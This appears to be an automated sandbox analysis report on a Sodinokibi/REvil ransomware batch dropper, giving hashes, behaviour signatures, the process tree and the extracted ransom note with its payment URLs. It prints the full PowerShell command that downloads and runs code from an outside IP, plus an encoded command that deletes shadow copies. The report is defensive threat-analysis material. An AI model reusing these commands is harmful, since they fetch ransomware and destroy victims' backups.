Overview

overview

10

Static

static

ce9dc8d828...52.bat

windows7_x64

10

ce9dc8d828...52.bat

windows10_x64

10

Analysis

  • max time kernel
    140s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    16-05-2020 02:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ce9dc8d828e18ce089cc6d84d08fe452.bat

  • Size

    219B

  • MD5

    2d905313dbc56c967f83d1426a7df00c

  • SHA1

    44f27a3aa997e1cb05864f2bfd2ec0da5f1ea539

  • SHA256

    7442acba79bb7e085e7198a9bdc242d324676559fb316ab487018457b4e0260c

  • SHA512

    05e139eea56972f817f4583326ec6a448e3f93c74268ba6ea310f4dd879716340843ff33dc9b970895c02fb72ee0db7c28accb07eb64a1b847d3fdddfe14b32b

Score
10/10
ransomwareevasionspywaretrojansodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/ce9dc8d828e18ce089cc6d84d08fe452

Extracted

Path

C:\l72kb975e-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension l72kb975e. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5220888DF7426CB 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/B5220888DF7426CB Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 5AmAgQpBI0tDppDP0bJTfXgnx7dstPw85BSRAYV8XlEFCUsJFPRmqpkzYMezmRC3 JBXRko0+GtsvrL0Lhq+3OShYAdH9VG51HViijFdxaFvcA1uFao5eDOj1oSNSygTj SeduJjpYGVxBI4ngXRw0WTVitjjWqRjIET7ceQSHe8Lh/lTUBaaBLTdCXs6uu6Nh WSGQ73I0DfleLsUfLCOiwOs34JckPvUXJgqWJMa6RO4Nce/rssf4nm+4h1pRZh6B 85bUAW3mZmSuVgputJn21omKuAhOSdlKlQsEhXUOw0nz7akyN8S2mGTrpQdKI7Dg aJ25PFcveQT/hb/DfiBQ0oNiQ6rQ57IMweoc+Dzhx4vzNdzGKtYU5w+jG+dM2QdJ rNoCXozZK0OJG6ffs8P1ft0JHs69jIl8wGCEbPfOTpumj3GFf7TABsQtQiNM1v0w N3E1vO09rLyi2QJDtaAT7/mKbZHeeqZX8Dy5Zasrqpp/XCcMxDAm1uhvaW7xdEb7 p0AaOWg3ERCTMQUoZbOk/qzf5onSzpVaWHabt4DR2KYVI4/T9z5R9sLxaP27ztmP wYEf34wZS+mqHbwyVVoIKJ1pmLXXhMtSR+SMVe43m05ugFNd/25KJEb7s2wEuPnH X4N6ZHmW0WBCXGSTppMqANSB9wbYskK7a4XG+9SnVHGNDWJHI/pg5mcn1agfFvum 8My7VM6kFiXmstJTaGZGAelFUy7PazvhslNCF0yBBSIHJbzdeVMmi2b+5LHs8d2R vJZ4hAtFDb93+CAo52n1u7jIyVXKxe+o5F4NrPnNtJ8UfY+2Ik9TPEfri4Mad04n SOTQjut+xe0jLH3cteEhPfmmrpBHKR6htoTbHNgAgM05GVrUD6/H7ineahiPxijX gRM5umolEdwPFLMy+h/eyHNQBccFSa5ISdAxHKJ44kpkfkbz5GnIfFZBqe5WSEFc J0WpmWaH7xtDizSiXV1EsnnQs/mnKQ+6nOYxaBEd4+WCCGV1l4IHc25QhZCdhD+q FbbQrW2ENPsRfU84uukG6zCf4p39iGmBjISbY5dH3eAn2tM6K+LvQT4R3SnzTROX NH9ChCElDq2qNsO82wL+ropqpy1dy1aSIDHNyHBXxC71Lb3EBiPRw0Xbt1vU/eUb 6JhXHS4oiOBcl3//X4zZlrBQIa4hPInt7eZtvhKgwATmjWQf2mTQGLBawmG44qbK IGmifHk0vMg9zMY34WMOQkJMH7pCW5Ozna36wZeAefJ2tTujcXIKTB5KmeT/J3th HGT/+GfHmYEDk9tOCz75fOBRdiSrltJfU/LcAI9nyIx/KEm13RE= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5220888DF7426CB

http://decryptor.cc/B5220888DF7426CB

Signatures

  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 168 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
    evasionspywaretrojan
  • Drops file in Program Files directory 26 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\ce9dc8d828e18ce089cc6d84d08fe452.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1520
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ce9dc8d828e18ce089cc6d84d08fe452');Invoke-PRBSJMAYEWZY;Start-Sleep -s 10000"
      2⤵
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Modifies system certificate store
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:868
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1172
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:784

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit